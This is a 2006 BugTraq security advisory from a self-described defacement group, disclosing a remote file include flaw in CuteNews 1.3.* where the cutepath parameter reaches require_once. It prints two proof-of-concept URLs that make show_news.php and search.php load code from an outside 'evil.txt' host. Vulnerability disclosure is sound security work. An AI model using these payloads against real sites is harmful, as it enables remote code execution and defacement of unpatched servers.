BugTraq
CuteNews 1.3.* Remote File Include Vulnerability Aug 25 2006 07:14PM
stormhacker hotmail com (2 replies)
Welcome people In World Defacers Team

[W]orld [D]efacers Team

======================================

--------------------Summary----------------

eVuln ID: WD22

Vendor: CuteNews 1.3.*

Vendor's Web Site: http://cutephp.com/

Software: Live Customer Support Solution :- http://www.pansionat.net/novost/

Class: Remote

PoC/Exploit: Available

Solution: Not Available

Discovered by: rUnViRuS (worlddefacers.de)

-----------------Description---------------

$cutepath = __FILE__;

$cutepath = preg_replace( "'\\\search\.php'", "", $cutepath);

$cutepath = preg_replace( "'/search\.php'", "", $cutepath);

require_once("$cutepath/inc/functions.inc.php");

--------------PoC/Exploit----------------------

show_news.php?cutepath=http://host/evil.txt?

search.php?cutepath=http://host/evil.txt?

--------------Solution---------------------

No Patch available.

--------------Credit-----------------------

Discovered by: rUnViRuS (worlddefacers.de)

[ reply ]
Re: CuteNews 1.3.* Remote File Include Vulnerability Sep 02 2006 07:46PM
satalin (satalin gmail com)
Re: CuteNews 1.3.* Remote File Include Vulnerability Aug 29 2006 10:12PM
Carsten Eilers (ceilers-lists gmx de)


 

Privacy Statement
Copyright 2010, SecurityFocus